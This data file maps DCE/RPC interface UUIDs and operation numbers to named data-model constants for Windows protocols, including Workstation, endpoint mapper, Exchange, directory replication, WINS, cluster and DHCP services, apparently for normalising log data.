6bffd098-a112-3610-9833-46c3f87e345a:1 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_SET_INFO
6bffd098-a112-3610-9833-46c3f87e345a:2 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_USER_ENUM
6bffd098-a112-3610-9833-46c3f87e345a:3 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_USER_GET_INFO
6bffd098-a112-3610-9833-46c3f87e345a:4 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_USER_SET_INFO
6bffd098-a112-3610-9833-46c3f87e345a:5 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_TRANSPORT_ENUM
6bffd098-a112-3610-9833-46c3f87e345a:6 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_TRANSPORT_ADD
6bffd098-a112-3610-9833-46c3f87e345a:7 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_TRANSPORT_DEL
6bffd098-a112-3610-9833-46c3f87e345a:8 XDM_CONST.DCERPC_OPERATION_NETR_USE_ADD
6bffd098-a112-3610-9833-46c3f87e345a:9 XDM_CONST.DCERPC_OPERATION_NETR_USE_GET_INFO
6bffd098-a112-3610-9833-46c3f87e345a:10 XDM_CONST.DCERPC_OPERATION_NETR_USE_DEL
6bffd098-a112-3610-9833-46c3f87e345a:11 XDM_CONST.DCERPC_OPERATION_NETR_USE_ENUM
6bffd098-a112-3610-9833-46c3f87e345a:12 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_BUFFER_SEND
6bffd098-a112-3610-9833-46c3f87e345a:13 XDM_CONST.DCERPC_OPERATION_NETR_WORKSTATION_STATISTICS_GET
6bffd098-a112-3610-9833-46c3f87e345a:14 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_DOMAIN_NAME_ADD
6bffd098-a112-3610-9833-46c3f87e345a:15 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_DOMAIN_NAME_DEL
6bffd098-a112-3610-9833-46c3f87e345a:16 XDM_CONST.DCERPC_OPERATION_NETR_JOIN_DOMAIN
6bffd098-a112-3610-9833-46c3f87e345a:17 XDM_CONST.DCERPC_OPERATION_NETR_UNJOIN_DOMAIN
6bffd098-a112-3610-9833-46c3f87e345a:18 XDM_CONST.DCERPC_OPERATION_NETR_VALIDATE_NAME
6bffd098-a112-3610-9833-46c3f87e345a:19 XDM_CONST.DCERPC_OPERATION_NETR_RENAME_MACHINE_IN_DOMAIN
6bffd098-a112-3610-9833-46c3f87e345a:20 XDM_CONST.DCERPC_OPERATION_NETR_GET_JOIN_INFORMATION
6bffd098-a112-3610-9833-46c3f87e345a:21 XDM_CONST.DCERPC_OPERATION_NETR_GET_JOINABLE_O_US
6bffd098-a112-3610-9833-46c3f87e345a:22 XDM_CONST.DCERPC_OPERATION_NETR_JOIN_DOMAIN2
6bffd098-a112-3610-9833-46c3f87e345a:23 XDM_CONST.DCERPC_OPERATION_NETR_UNJOIN_DOMAIN2
6bffd098-a112-3610-9833-46c3f87e345a:24 XDM_CONST.DCERPC_OPERATION_NETR_RENAME_MACHINE_IN_DOMAIN2
6bffd098-a112-3610-9833-46c3f87e345a:25 XDM_CONST.DCERPC_OPERATION_NETR_VALIDATE_NAME2
6bffd098-a112-3610-9833-46c3f87e345a:26 XDM_CONST.DCERPC_OPERATION_NETR_GET_JOINABLE_O_US2
6bffd098-a112-3610-9833-46c3f87e345a:27 XDM_CONST.DCERPC_OPERATION_NETR_ADD_ALTERNATE_COMPUTER_NAME
6bffd098-a112-3610-9833-46c3f87e345a:28 XDM_CONST.DCERPC_OPERATION_NETR_REMOVE_ALTERNATE_COMPUTER_NAME
6bffd098-a112-3610-9833-46c3f87e345a:29 XDM_CONST.DCERPC_OPERATION_NETR_SET_PRIMARY_COMPUTER_NAME
6bffd098-a112-3610-9833-46c3f87e345a:30 XDM_CONST.DCERPC_OPERATION_NETR_ENUMERATE_COMPUTER_NAMES
6bffd098-a112-3610-9833-46c3f87e345a:31 XDM_CONST.DCERPC_OPERATION_NETR_WORKSTATION_RESET_DFS_CACHE
e1af8308-5d1f-11c9-91a4-08002b14a0fa:0 XDM_CONST.DCERPC_OPERATION_EPTINSERT
e1af8308-5d1f-11c9-91a4-08002b14a0fa:1 XDM_CONST.DCERPC_OPERATION_EPTDELETE
e1af8308-5d1f-11c9-91a4-08002b14a0fa:2 XDM_CONST.DCERPC_OPERATION_EPTLOOKUP
e1af8308-5d1f-11c9-91a4-08002b14a0fa:3 XDM_CONST.DCERPC_OPERATION_EPTMAP
e1af8308-5d1f-11c9-91a4-08002b14a0fa:4 XDM_CONST.DCERPC_OPERATION_EPTLOOKUPHANDLEFREE
e1af8308-5d1f-11c9-91a4-08002b14a0fa:5 XDM_CONST.DCERPC_OPERATION_EPTINQOBJECT
e1af8308-5d1f-11c9-91a4-08002b14a0fa:6 XDM_CONST.DCERPC_OPERATION_EPTMGMTDELETE
e1af8308-5d1f-11c9-91a4-08002b14a0fa:7 XDM_CONST.DCERPC_OPERATION_EPTMAPAUTH
e1af8308-5d1f-11c9-91a4-08002b14a0fa:8 XDM_CONST.DCERPC_OPERATION_EPTMAPAUTHASYNC
a4f1db00-ca47-1067-b31f-00dd010662da:0 XDM_CONST.DCERPC_OPERATION_EC_DO_CONNECT
a4f1db00-ca47-1067-b31f-00dd010662da:1 XDM_CONST.DCERPC_OPERATION_EC_DO_DISCONNECT
a4f1db00-ca47-1067-b31f-00dd010662da:2 XDM_CONST.DCERPC_OPERATION_EC_DO_RPC
a4f1db00-ca47-1067-b31f-00dd010662da:3 XDM_CONST.DCERPC_OPERATION_EC_GET_MORE_RPC
a4f1db00-ca47-1067-b31f-00dd010662da:4 XDM_CONST.DCERPC_OPERATION_EC_R_REGISTER_PUSH_NOTIFICATION
a4f1db00-ca47-1067-b31f-00dd010662da:5 XDM_CONST.DCERPC_OPERATION_EC_R_UNREGISTER_PUSH_NOTIFICATION
a4f1db00-ca47-1067-b31f-00dd010662da:6 XDM_CONST.DCERPC_OPERATION_EC_DUMMY_RPC
a4f1db00-ca47-1067-b31f-00dd010662da:7 XDM_CONST.DCERPC_OPERATION_EC_R_GET_DC_NAME
a4f1db00-ca47-1067-b31f-00dd010662da:8 XDM_CONST.DCERPC_OPERATION_EC_R_NET_GET_DC_NAME
a4f1db00-ca47-1067-b31f-00dd010662da:9 XDM_CONST.DCERPC_OPERATION_EC_DO_RPC_EXT
a4f1db00-ca47-1067-b31f-00dd010662da:10 XDM_CONST.DCERPC_OPERATION_EC_DO_CONNECT_EX
a4f1db00-ca47-1067-b31f-00dd010662da:11 XDM_CONST.DCERPC_OPERATION_EC_DO_RPC_EXT2
a4f1db00-ca47-1067-b31f-00dd010662da:12 XDM_CONST.DCERPC_OPERATION_EC_UNKNOWN0X_C
a4f1db00-ca47-1067-b31f-00dd010662da:13 XDM_CONST.DCERPC_OPERATION_EC_UNKNOWN0X_D
a4f1db00-ca47-1067-b31f-00dd010662da:14 XDM_CONST.DCERPC_OPERATION_EC_DO_ASYNC_CONNECT_EX
e3514235-4b06-11d1-ab04-00c04fc2dcd2:0 XDM_CONST.DCERPC_OPERATION_DRS_BIND
e3514235-4b06-11d1-ab04-00c04fc2dcd2:1 XDM_CONST.DCERPC_OPERATION_DRS_UNBIND
e3514235-4b06-11d1-ab04-00c04fc2dcd2:2 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_SYNC
e3514235-4b06-11d1-ab04-00c04fc2dcd2:3 XDM_CONST.DCERPC_OPERATION_DRS_GET_NC_CHANGES
e3514235-4b06-11d1-ab04-00c04fc2dcd2:4 XDM_CONST.DCERPC_OPERATION_DRS_UPDATE_REFS
e3514235-4b06-11d1-ab04-00c04fc2dcd2:5 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_ADD
e3514235-4b06-11d1-ab04-00c04fc2dcd2:6 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_DEL
e3514235-4b06-11d1-ab04-00c04fc2dcd2:7 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_MODIFY
e3514235-4b06-11d1-ab04-00c04fc2dcd2:8 XDM_CONST.DCERPC_OPERATION_DRS_VERIFY_NAMES
e3514235-4b06-11d1-ab04-00c04fc2dcd2:9 XDM_CONST.DCERPC_OPERATION_DRS_GET_MEMBERSHIPS
e3514235-4b06-11d1-ab04-00c04fc2dcd2:10 XDM_CONST.DCERPC_OPERATION_DRS_INTER_DOMAIN_MOVE
e3514235-4b06-11d1-ab04-00c04fc2dcd2:11 XDM_CONST.DCERPC_OPERATION_DRS_GET_NT4_CHANGE_LOG
e3514235-4b06-11d1-ab04-00c04fc2dcd2:12 XDM_CONST.DCERPC_OPERATION_DRS_CRACK_NAMES
e3514235-4b06-11d1-ab04-00c04fc2dcd2:13 XDM_CONST.DCERPC_OPERATION_DRS_WRITE_SPN
e3514235-4b06-11d1-ab04-00c04fc2dcd2:14 XDM_CONST.DCERPC_OPERATION_DRS_REMOVE_DS_SERVER
e3514235-4b06-11d1-ab04-00c04fc2dcd2:15 XDM_CONST.DCERPC_OPERATION_DRS_REMOVE_DS_DOMAIN
e3514235-4b06-11d1-ab04-00c04fc2dcd2:16 XDM_CONST.DCERPC_OPERATION_DRS_DOMAIN_CONTROLLER_INFO
e3514235-4b06-11d1-ab04-00c04fc2dcd2:17 XDM_CONST.DCERPC_OPERATION_DRS_ADD_ENTRY
e3514235-4b06-11d1-ab04-00c04fc2dcd2:18 XDM_CONST.DCERPC_OPERATION_DRS_EXECUTE_KCC
e3514235-4b06-11d1-ab04-00c04fc2dcd2:19 XDM_CONST.DCERPC_OPERATION_DRS_GET_REPL_INFO
e3514235-4b06-11d1-ab04-00c04fc2dcd2:20 XDM_CONST.DCERPC_OPERATION_DRS_ADD_SID_HISTORY
e3514235-4b06-11d1-ab04-00c04fc2dcd2:21 XDM_CONST.DCERPC_OPERATION_DRS_GET_MEMBERSHIPS2
e3514235-4b06-11d1-ab04-00c04fc2dcd2:22 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_VERIFY_OBJECTS
e3514235-4b06-11d1-ab04-00c04fc2dcd2:23 XDM_CONST.DCERPC_OPERATION_DRS_GET_OBJECT_EXISTENCE
e3514235-4b06-11d1-ab04-00c04fc2dcd2:24 XDM_CONST.DCERPC_OPERATION_DRS_QUERY_SITES_BY_COST
45f52c28-7f9f-101a-b52b-08002b2efabe:0 XDM_CONST.DCERPC_OPERATION_R_WINS_RECORD_ACTION
45f52c28-7f9f-101a-b52b-08002b2efabe:1 XDM_CONST.DCERPC_OPERATION_R_WINS_STATUS
45f52c28-7f9f-101a-b52b-08002b2efabe:2 XDM_CONST.DCERPC_OPERATION_R_WINS_TRIGGER
45f52c28-7f9f-101a-b52b-08002b2efabe:3 XDM_CONST.DCERPC_OPERATION_R_WINS_DO_STATIC_INIT
45f52c28-7f9f-101a-b52b-08002b2efabe:4 XDM_CONST.DCERPC_OPERATION_R_WINS_DO_SCAVENGING
45f52c28-7f9f-101a-b52b-08002b2efabe:5 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_DB_RECS
45f52c28-7f9f-101a-b52b-08002b2efabe:6 XDM_CONST.DCERPC_OPERATION_R_WINS_TERM
45f52c28-7f9f-101a-b52b-08002b2efabe:7 XDM_CONST.DCERPC_OPERATION_R_WINS_BACKUP
45f52c28-7f9f-101a-b52b-08002b2efabe:8 XDM_CONST.DCERPC_OPERATION_R_WINS_DEL_DB_RECS
45f52c28-7f9f-101a-b52b-08002b2efabe:9 XDM_CONST.DCERPC_OPERATION_R_WINS_PULL_RANGE
45f52c28-7f9f-101a-b52b-08002b2efabe:10 XDM_CONST.DCERPC_OPERATION_R_WINS_SET_PRIORITY_CLASS
45f52c28-7f9f-101a-b52b-08002b2efabe:11 XDM_CONST.DCERPC_OPERATION_R_WINS_RESET_COUNTERS
45f52c28-7f9f-101a-b52b-08002b2efabe:12 XDM_CONST.DCERPC_OPERATION_R_WINS_WORKER_THD_UPD
45f52c28-7f9f-101a-b52b-08002b2efabe:13 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_NAME_AND_ADD
45f52c28-7f9f-101a-b52b-08002b2efabe:14 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_BROWSER_NAMES_OLD
45f52c28-7f9f-101a-b52b-08002b2efabe:15 XDM_CONST.DCERPC_OPERATION_R_WINS_DELETE_WINS
45f52c28-7f9f-101a-b52b-08002b2efabe:16 XDM_CONST.DCERPC_OPERATION_R_WINS_SET_FLAGS
45f52c28-7f9f-101a-b52b-08002b2efabe:17 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_DB_RECS_BY_NAME
45f52c28-7f9f-101a-b52b-08002b2efabe:18 XDM_CONST.DCERPC_OPERATION_R_WINS_STATUS_W_HDL
45f52c28-7f9f-101a-b52b-08002b2efabe:19 XDM_CONST.DCERPC_OPERATION_R_WINS_DO_SCAVENGING_NEW
afa8bd80-7d8a-11c9-bef4-08002b102989:0 XDM_CONST.DCERPC_OPERATION_INQIFIDS
afa8bd80-7d8a-11c9-bef4-08002b102989:1 XDM_CONST.DCERPC_OPERATION_INQSTATS
afa8bd80-7d8a-11c9-bef4-08002b102989:2 XDM_CONST.DCERPC_OPERATION_ISSERVERLISTENING
afa8bd80-7d8a-11c9-bef4-08002b102989:3 XDM_CONST.DCERPC_OPERATION_STOPSERVERLISTENING
afa8bd80-7d8a-11c9-bef4-08002b102989:4 XDM_CONST.DCERPC_OPERATION_INQPRINCNAME
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:0 XDM_CONST.DCERPC_OPERATION_AUTHZR_FREE_CONTEXT
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:1 XDM_CONST.DCERPC_OPERATION_AUTHZR_INITIALIZE_CONTEXT_FROM_SID
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:2 XDM_CONST.DCERPC_OPERATION_AUTHRZ_INITIALIZE_COMPOUND_CONTEXT
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:3 XDM_CONST.DCERPC_OPERATION_AUTHRZ_ACCESS_CHECK
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:4 XDM_CONST.DCERPC_OPERATION_AUTHRZ_GET_INFORMATION_FROM_CONTEXT
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:5 XDM_CONST.DCERPC_OPERATION_AUTHRZ_MODIFY_CLAIMS
0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:6 XDM_CONST.DCERPC_OPERATION_AUTHRZ_MODIFY_SIDS
e3d0d746-d2af-40fd-8a7a-0d7078bb7092:0 XDM_CONST.DCERPC_OPERATION_EXCHANGE_PUBLIC_KEYS
b97db8b2-4c63-11cf-bff6-08002be23f2f:0 XDM_CONST.DCERPC_OPERATION_API_OPEN_CLUSTER
b97db8b2-4c63-11cf-bff6-08002be23f2f:1 XDM_CONST.DCERPC_OPERATION_API_CLOSE_CLUSTER
b97db8b2-4c63-11cf-bff6-08002be23f2f:2 XDM_CONST.DCERPC_OPERATION_API_SET_CLUSTER_NAME
b97db8b2-4c63-11cf-bff6-08002be23f2f:3 XDM_CONST.DCERPC_OPERATION_API_GET_CLUSTER_NAME
b97db8b2-4c63-11cf-bff6-08002be23f2f:4 XDM_CONST.DCERPC_OPERATION_API_GET_CLUSTER_VERSION
b97db8b2-4c63-11cf-bff6-08002be23f2f:5 XDM_CONST.DCERPC_OPERATION_API_GET_QUORUM_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:6 XDM_CONST.DCERPC_OPERATION_API_SET_QUORUM_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:7 XDM_CONST.DCERPC_OPERATION_API_CREATE_ENUM
b97db8b2-4c63-11cf-bff6-08002be23f2f:8 XDM_CONST.DCERPC_OPERATION_API_OPEN_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:9 XDM_CONST.DCERPC_OPERATION_API_CREATE_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:10 XDM_CONST.DCERPC_OPERATION_API_DELETE_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:11 XDM_CONST.DCERPC_OPERATION_API_CLOSE_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:12 XDM_CONST.DCERPC_OPERATION_API_GET_RESOURCE_STATE
b97db8b2-4c63-11cf-bff6-08002be23f2f:13 XDM_CONST.DCERPC_OPERATION_API_SET_RESOURCE_NAME
b97db8b2-4c63-11cf-bff6-08002be23f2f:14 XDM_CONST.DCERPC_OPERATION_API_GET_RESOURCE_ID
b97db8b2-4c63-11cf-bff6-08002be23f2f:15 XDM_CONST.DCERPC_OPERATION_API_GET_RESOURCE_TYPE
b97db8b2-4c63-11cf-bff6-08002be23f2f:16 XDM_CONST.DCERPC_OPERATION_API_FAIL_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:17 XDM_CONST.DCERPC_OPERATION_API_ONLINE_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:18 XDM_CONST.DCERPC_OPERATION_API_OFFLINE_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:19 XDM_CONST.DCERPC_OPERATION_API_ADD_RESOURCE_DEPENDENCY
b97db8b2-4c63-11cf-bff6-08002be23f2f:20 XDM_CONST.DCERPC_OPERATION_API_REMOVE_RESOURCE_DEPENDENCY
b97db8b2-4c63-11cf-bff6-08002be23f2f:21 XDM_CONST.DCERPC_OPERATION_API_CAN_RESOURCE_BE_DEPENDENT
b97db8b2-4c63-11cf-bff6-08002be23f2f:22 XDM_CONST.DCERPC_OPERATION_API_CREATE_RES_ENUM
b97db8b2-4c63-11cf-bff6-08002be23f2f:23 XDM_CONST.DCERPC_OPERATION_API_ADD_RESOURCE_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:24 XDM_CONST.DCERPC_OPERATION_API_REMOVE_RESOURCE_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:25 XDM_CONST.DCERPC_OPERATION_API_CHANGE_RESOURCE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:26 XDM_CONST.DCERPC_OPERATION_API_CREATE_RESOURCE_TYPE
b97db8b2-4c63-11cf-bff6-08002be23f2f:27 XDM_CONST.DCERPC_OPERATION_API_DELETE_RESOURCE_TYPE
b97db8b2-4c63-11cf-bff6-08002be23f2f:28 XDM_CONST.DCERPC_OPERATION_API_GET_ROOT_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:29 XDM_CONST.DCERPC_OPERATION_API_CREATE_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:30 XDM_CONST.DCERPC_OPERATION_API_OPEN_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:31 XDM_CONST.DCERPC_OPERATION_API_ENUM_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:32 XDM_CONST.DCERPC_OPERATION_API_SET_VALUE
b97db8b2-4c63-11cf-bff6-08002be23f2f:33 XDM_CONST.DCERPC_OPERATION_API_DELETE_VALUE
b97db8b2-4c63-11cf-bff6-08002be23f2f:34 XDM_CONST.DCERPC_OPERATION_API_QUERY_VALUE
b97db8b2-4c63-11cf-bff6-08002be23f2f:35 XDM_CONST.DCERPC_OPERATION_API_DELETE_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:36 XDM_CONST.DCERPC_OPERATION_API_ENUM_VALUE
b97db8b2-4c63-11cf-bff6-08002be23f2f:37 XDM_CONST.DCERPC_OPERATION_API_CLOSE_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:38 XDM_CONST.DCERPC_OPERATION_API_QUERY_INFO_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:39 XDM_CONST.DCERPC_OPERATION_API_SET_KEY_SECURITY
b97db8b2-4c63-11cf-bff6-08002be23f2f:40 XDM_CONST.DCERPC_OPERATION_API_GET_KEY_SECURITY
b97db8b2-4c63-11cf-bff6-08002be23f2f:41 XDM_CONST.DCERPC_OPERATION_API_OPEN_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:42 XDM_CONST.DCERPC_OPERATION_API_CREATE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:43 XDM_CONST.DCERPC_OPERATION_API_DELETE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:44 XDM_CONST.DCERPC_OPERATION_API_CLOSE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:45 XDM_CONST.DCERPC_OPERATION_API_GET_GROUP_STATE
b97db8b2-4c63-11cf-bff6-08002be23f2f:46 XDM_CONST.DCERPC_OPERATION_API_SET_GROUP_NAME
b97db8b2-4c63-11cf-bff6-08002be23f2f:47 XDM_CONST.DCERPC_OPERATION_API_GET_GROUP_ID
b97db8b2-4c63-11cf-bff6-08002be23f2f:48 XDM_CONST.DCERPC_OPERATION_API_GET_NODE_ID
b97db8b2-4c63-11cf-bff6-08002be23f2f:49 XDM_CONST.DCERPC_OPERATION_API_ONLINE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:50 XDM_CONST.DCERPC_OPERATION_API_OFFLINE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:51 XDM_CONST.DCERPC_OPERATION_API_MOVE_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:52 XDM_CONST.DCERPC_OPERATION_API_MOVE_GROUP_TO_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:53 XDM_CONST.DCERPC_OPERATION_API_CREATE_GROUP_RESOURCE_ENUM
b97db8b2-4c63-11cf-bff6-08002be23f2f:54 XDM_CONST.DCERPC_OPERATION_API_SET_GROUP_NODE_LIST
b97db8b2-4c63-11cf-bff6-08002be23f2f:55 XDM_CONST.DCERPC_OPERATION_API_CREATE_NOTIFY
b97db8b2-4c63-11cf-bff6-08002be23f2f:56 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NOTIFY
b97db8b2-4c63-11cf-bff6-08002be23f2f:57 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_CLUSTER
b97db8b2-4c63-11cf-bff6-08002be23f2f:58 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:59 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:60 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:61 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_KEY
b97db8b2-4c63-11cf-bff6-08002be23f2f:62 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:63 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_GROUP
b97db8b2-4c63-11cf-bff6-08002be23f2f:64 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_RESOURCE
b97db8b2-4c63-11cf-bff6-08002be23f2f:65 XDM_CONST.DCERPC_OPERATION_API_GET_NOTIFY
b97db8b2-4c63-11cf-bff6-08002be23f2f:66 XDM_CONST.DCERPC_OPERATION_API_OPEN_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:67 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:68 XDM_CONST.DCERPC_OPERATION_API_GET_NODE_STATE
b97db8b2-4c63-11cf-bff6-08002be23f2f:69 XDM_CONST.DCERPC_OPERATION_API_PAUSE_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:70 XDM_CONST.DCERPC_OPERATION_API_RESUME_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:71 XDM_CONST.DCERPC_OPERATION_API_EVICT_NODE
b97db8b2-4c63-11cf-bff6-08002be23f2f:72 XDM_CONST.DCERPC_OPERATION_API_NODE_RESOURCE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:73 XDM_CONST.DCERPC_OPERATION_API_RESOURCE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:74 XDM_CONST.DCERPC_OPERATION_API_NODE_RESOURCE_TYPE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:75 XDM_CONST.DCERPC_OPERATION_API_RESOURCE_TYPE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:76 XDM_CONST.DCERPC_OPERATION_API_NODE_GROUP_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:77 XDM_CONST.DCERPC_OPERATION_API_GROUP_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:78 XDM_CONST.DCERPC_OPERATION_API_NODE_NODE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:79 XDM_CONST.DCERPC_OPERATION_API_NODE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:81 XDM_CONST.DCERPC_OPERATION_API_OPEN_NETWORK
b97db8b2-4c63-11cf-bff6-08002be23f2f:82 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NETWORK
b97db8b2-4c63-11cf-bff6-08002be23f2f:83 XDM_CONST.DCERPC_OPERATION_API_GET_NETWORK_STATE
b97db8b2-4c63-11cf-bff6-08002be23f2f:84 XDM_CONST.DCERPC_OPERATION_API_SET_NETWORK_NAME
b97db8b2-4c63-11cf-bff6-08002be23f2f:85 XDM_CONST.DCERPC_OPERATION_API_CREATE_NETWORK_ENUM
b97db8b2-4c63-11cf-bff6-08002be23f2f:86 XDM_CONST.DCERPC_OPERATION_API_GET_NETWORK_ID
b97db8b2-4c63-11cf-bff6-08002be23f2f:87 XDM_CONST.DCERPC_OPERATION_API_SET_NETWORK_PRIORITY_ORDER
b97db8b2-4c63-11cf-bff6-08002be23f2f:88 XDM_CONST.DCERPC_OPERATION_API_NODE_NETWORK_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:89 XDM_CONST.DCERPC_OPERATION_API_NETWORK_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:90 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_NETWORK
b97db8b2-4c63-11cf-bff6-08002be23f2f:91 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_NETWORK
b97db8b2-4c63-11cf-bff6-08002be23f2f:92 XDM_CONST.DCERPC_OPERATION_API_OPEN_NET_INTERFACE
b97db8b2-4c63-11cf-bff6-08002be23f2f:93 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NET_INTERFACE
b97db8b2-4c63-11cf-bff6-08002be23f2f:94 XDM_CONST.DCERPC_OPERATION_API_GET_NET_INTERFACE_STATE
b97db8b2-4c63-11cf-bff6-08002be23f2f:95 XDM_CONST.DCERPC_OPERATION_API_GET_NET_INTERFACE
b97db8b2-4c63-11cf-bff6-08002be23f2f:96 XDM_CONST.DCERPC_OPERATION_API_GET_NET_INTERFACE_ID
b97db8b2-4c63-11cf-bff6-08002be23f2f:97 XDM_CONST.DCERPC_OPERATION_API_NODE_NET_INTERFACE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:98 XDM_CONST.DCERPC_OPERATION_API_NET_INTERFACE_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:99 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_NET_INTERFACE
b97db8b2-4c63-11cf-bff6-08002be23f2f:100 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_NET_INTERFACE
b97db8b2-4c63-11cf-bff6-08002be23f2f:101 XDM_CONST.DCERPC_OPERATION_API_CREATE_NODE_ENUM
b97db8b2-4c63-11cf-bff6-08002be23f2f:102 XDM_CONST.DCERPC_OPERATION_API_GET_CLUSTER_VERSION2
b97db8b2-4c63-11cf-bff6-08002be23f2f:103 XDM_CONST.DCERPC_OPERATION_API_CREATE_RES_TYPE_ENUM
b97db8b2-4c63-11cf-bff6-08002be23f2f:104 XDM_CONST.DCERPC_OPERATION_API_BACKUP_CLUSTER_DATABASE
b97db8b2-4c63-11cf-bff6-08002be23f2f:105 XDM_CONST.DCERPC_OPERATION_API_NODE_CLUSTER_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:106 XDM_CONST.DCERPC_OPERATION_API_CLUSTER_CONTROL
b97db8b2-4c63-11cf-bff6-08002be23f2f:107 XDM_CONST.DCERPC_OPERATION_API_UNBLOCK_GET_NOTIFY_CALL
b97db8b2-4c63-11cf-bff6-08002be23f2f:108 XDM_CONST.DCERPC_OPERATION_API_SET_SERVICE_ACCOUNT_PASSWORD
6bffd098-a112-3610-9833-46c3f874532d:0 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_SUBNET
6bffd098-a112-3610-9833-46c3f874532d:1 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUBNET_INFO
6bffd098-a112-3610-9833-46c3f874532d:2 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_INFO
6bffd098-a112-3610-9833-46c3f874532d:3 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNETS
6bffd098-a112-3610-9833-46c3f874532d:4 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT
6bffd098-a112-3610-9833-46c3f874532d:5 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS
6bffd098-a112-3610-9833-46c3f874532d:6 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT
6bffd098-a112-3610-9833-46c3f874532d:7 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_SUBNET
